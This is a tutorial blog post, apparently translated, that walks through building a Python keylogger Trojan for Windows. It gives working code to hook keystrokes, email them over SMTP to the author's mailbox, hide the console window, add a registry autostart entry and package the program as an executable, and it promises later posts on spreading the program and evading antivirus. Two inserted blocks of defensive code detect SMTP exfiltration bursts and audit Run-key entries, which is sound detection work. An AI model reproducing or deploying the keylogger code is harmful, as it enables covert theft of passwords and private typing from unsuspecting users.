I recently came across Python's Win32 library. Its subroutines expose a number of APIs that can be used for Windows development, and this post uses them to build a prototype of a keyboard-listening Trojan.
Two extra modules are needed: pyHook (for placing the hooks) and pythoncom.
Code for the main monitoring function:
    import sys
    import pyHook
    import pythoncom

    a = []  # collected keystrokes

    # place the keyboard hook
    def seeing():
        ph = pyHook.HookManager()
        ph.KeyDown = keyboardevent
        ph.HookKeyboard()
        pythoncom.PumpMessages()

    # keyboard event callback
    def keyboardevent(event):
        # print event.Key
        if len(a) <= 20:
            # for the experiment, mail is sent once 20 characters have been collected; raise this as needed
            a.append(event.Key)
        else:
            text = ''.join(a)
            if send_mail(to, "Keylogger test1", text):
                print "succeed!"
            else:
                print "failed!"
            sys.exit(0)
        return True

This is the core function of the program: it listens for all keyboard events and saves them in the list a.
The next step is to use the SMTP protocol to send the recorded keyboard events.
The relevant code is as follows:
    # send mail over SMTP
    import sys
    import re
    import urllib
    import smtplib
    import random
    from email.mime.text import MIMEText

    # change these to match your SMTP server and account
    to = ['******@163.com']
    host = "smtp.163.com"    # SMTP server
    user = "***"             # user name
    password = "******"      # password
    postfix = "163.com"      # address suffix

    # send-mail function
    def send_mail(to_list, sub, content):
        me = "keylogger" + "<" + user + "@" + postfix + ">"
        msg = MIMEText(content, _subtype='plain', _charset='gb2312')
        msg['Subject'] = sub
        msg['From'] = me
        msg['To'] = ";".join(to_list)
        try:
            server = smtplib.SMTP()
            server.connect(host)
            server.login(user, password)
            server.sendmail(me, to_list, msg.as_string())
            server.close()
            return True
        except Exception, e:
            print str(e)
            return False
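From the defender's side, the weak point of this design is the exfiltration channel: an unexpected process opening outbound SMTP connections, and doing so in bursts. The following is an added example (not part of the original post) that runs a simple detection over endpoint network-connection telemetry. The CSV events, field names, allow-list and thresholds are all constructed for the example and are assumptions, not the output of any particular product.

```python
"""Flag processes that behave like a mail-based keylogger: non-mail-client
images making outbound SMTP connections, and bursts of such connections.

Added example; the event rows below are constructed, not captured data.
"""
import csv
import io
from collections import defaultdict
from datetime import datetime

SMTP_PORTS = {25, 465, 587}
# Images that are expected to talk SMTP (assumed allow-list for the example).
MAIL_CLIENT_ALLOWLIST = {"thunderbird.exe", "outlook.exe"}

# Constructed sample telemetry: time, process image, destination, port, direction.
SAMPLE_EVENTS = r"""time,image,dest_ip,dest_port,initiated
2024-01-01T09:00:01,C:\Program Files\Mozilla Thunderbird\thunderbird.exe,203.0.113.10,587,true
2024-01-01T09:00:05,C:\Users\alice\AppData\Local\Temp\dist\hiding.exe,203.0.113.10,25,true
2024-01-01T09:00:06,C:\Users\alice\AppData\Local\Temp\dist\hiding.exe,203.0.113.10,25,true
2024-01-01T09:00:09,C:\Users\alice\AppData\Local\Temp\dist\hiding.exe,203.0.113.10,25,true
2024-01-01T09:00:20,C:\Windows\System32\svchost.exe,203.0.113.20,443,true
"""


def parse_events(text):
    """Parse the constructed CSV into dicts with typed fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "time": datetime.fromisoformat(row["time"]),
            "image": row["image"],
            "port": int(row["dest_port"]),
            "initiated": row["initiated"].lower() == "true",
        })
    return events


def detect_smtp_exfil(events, burst_threshold=3, window_seconds=60):
    """Return (rule, image, first_time) findings.

    Rule 1: an image outside the mail-client allow-list initiating SMTP.
    Rule 2: any image making burst_threshold or more SMTP connections
            inside a window_seconds sliding window.
    """
    findings = []
    flagged_images = set()
    smtp_times = defaultdict(list)
    for ev in events:
        if not ev["initiated"] or ev["port"] not in SMTP_PORTS:
            continue
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name not in MAIL_CLIENT_ALLOWLIST and ev["image"] not in flagged_images:
            flagged_images.add(ev["image"])
            findings.append(("unexpected_smtp_client", ev["image"], ev["time"]))
        smtp_times[ev["image"]].append(ev["time"])
    for image, times in smtp_times.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= burst_threshold:
                findings.append(("smtp_burst", image, times[i]))
                break
    return findings


if __name__ == "__main__":
    for rule, image, when in detect_smtp_exfil(parse_events(SAMPLE_EVENTS)):
        print("%s  %s  %s" % (when.isoformat(), rule, image))
```

Both rules fire on hiding.exe in the sample and neither fires on the mail client, which is the separation a SOC would want before raising an alert; the allow-list and burst threshold are the two knobs to tune per environment.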
The core functional part of the prototype is complete; now the listener is modified:
While monitoring is in progress the console window should not be visible, and the program should only run as a background process. Here is how to start without a console window, silently in the background.
Related code:
    import ctypes

    # hide the console window
    def hiding():
        whnd = ctypes.windll.kernel32.GetConsoleWindow()
        if whnd != 0:
            ctypes.windll.user32.ShowWindow(whnd, 0)
            ctypes.windll.kernel32.CloseHandle(whnd)
But the above is not enough: a complete Trojan program also needs to include self-propagation and self-starting.
For this we need to modify Windows registry information, and the win32api library provides the methods:
1. First, you need to obtain the location of the execution program itself.
Related code:
    # get the directory the trojan is running from
    def path():
        import inspect, os
        caller_file = inspect.stack()[1][1]
        return os.path.abspath(os.path.dirname(caller_file))
2. Modify the registry information:
Related code:
    import win32api
    import win32con

    def autorun():
        path_way = path()
        key = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
                                  'Software\\software\\microsoft\\windows\\currentversion\\run',
                                  0, win32con.KEY_ALL_ACCESS)
        win32api.RegCreateKey(key, path_way)  # add the trojan's path to the registry autostart entry
        win32api.RegCloseKey(key)
        return

With that, the keyboard-listening Trojan is basically complete; self-propagation is still missing (the next post will cover it in detail).
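The Run key the post writes to is also one of the first places a defender or incident responder looks. As an added example (not part of the original post), the following audits Run-key entries and flags ones launched from outside the usual program directories, or launched through a script interpreter, which is what a dropped py2exe binary or a .pyw script under a user profile would look like. The sample entries, the trusted-directory list and the interpreter list are constructed assumptions for the example; on Windows, read_run_keys() reads the real values through the standard library's winreg module.

```python
"""Audit Windows Run-key autostart entries for suspicious launch paths.

Added example, not the post's code. SAMPLE_ENTRIES are constructed;
read_run_keys() enumerates the real HKLM/HKCU Run keys when run on Windows
and returns an empty list elsewhere.
"""
import re

# Directories from which autostart entries are normally launched (assumed policy).
TRUSTED_PREFIXES = (
    r"c:\program files",
    r"c:\windows\system32",
)

RUN_KEY_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample: (hive, value name, command line)
SAMPLE_ENTRIES = [
    ("HKLM", "VendorUpdater", r'"C:\Program Files\Vendor\Updater.exe" /background'),
    ("HKCU", "hiding", r"C:\Users\alice\AppData\Local\Temp\dist\hiding.exe"),
    ("HKCU", "kb", r"C:\Python27\pythonw.exe C:\Users\alice\keylogger.pyw"),
]


def executable_from_command(command):
    """Extract the executable path from a Run-key command line.

    Handles a quoted path with arguments and an unquoted path followed by
    arguments (split at the first recognised extension).
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.+?\.(?:exe|bat|cmd|vbs|js|ps1|pyw?))(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command.split()[0]


def audit_entries(entries):
    """Return (hive, name, command, reasons) for every suspicious entry."""
    findings = []
    for hive, name, command in entries:
        exe = executable_from_command(command)
        norm = exe.lower().replace("/", "\\")
        reasons = []
        if not norm.startswith(TRUSTED_PREFIXES):
            reasons.append("launched from untrusted directory: %s" % exe)
        if re.search(r"(?:^|\\)(?:pythonw?|wscript|cscript|powershell|cmd)\.exe$", norm):
            reasons.append("script interpreter used as autostart launcher")
        if reasons:
            findings.append((hive, name, command, reasons))
    return findings


def read_run_keys():
    """Enumerate real Run-key values on Windows; empty list on other platforms."""
    try:
        import winreg
    except ImportError:
        return []
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    entries = []
    for hive_name, hive in hives.items():
        try:
            key = winreg.OpenKey(hive, RUN_KEY_PATH)
        except OSError:
            continue
        with key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                entries.append((hive_name, name, str(value)))
                i += 1
    return entries


if __name__ == "__main__":
    for hive, name, command, reasons in audit_entries(read_run_keys() or SAMPLE_ENTRIES):
        print("%s\\...\\Run\\%s = %s" % (hive, name, command))
        for r in reasons:
            print("    - " + r)
```

Run against the constructed sample it flags "hiding" (user temp directory) and "kb" (untrusted directory and an interpreter as the launcher) while leaving the vendor updater alone; in a real audit the same check is worth repeating for the RunOnce keys and the per-user Startup folder.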
There is one more problem: most computers do not have a Python interpreter installed. To get the program to run on other Windows machines I used the method provided by py2exe and distutils
(the newer distutils is bundled with py2exe).
First create a setup.py
The relevant code is as follows:
    # setup.py
    from distutils.core import setup
    import py2exe

    setup(console=["hiding.py"])  # name of the python file to package
Then execute in console:
    python setup.py py2exe
py2exe then generates the executable, and the Trojan that listens for keyboard input is complete.
Try running the following:
The data is sent in clear text, and after receiving hundreds of messages in a short time the mail server may freeze the mailbox, so the way keyboard events are collected could be improved, for example with a more suitable communication protocol.
The next article will cover how to evade various anti-virus products.
PS: This article is for study only; don't cross the line lightly!
Python keyboard monitoring Trojan (SMTP mailbox to receive monitoring results, modify the registry self-start)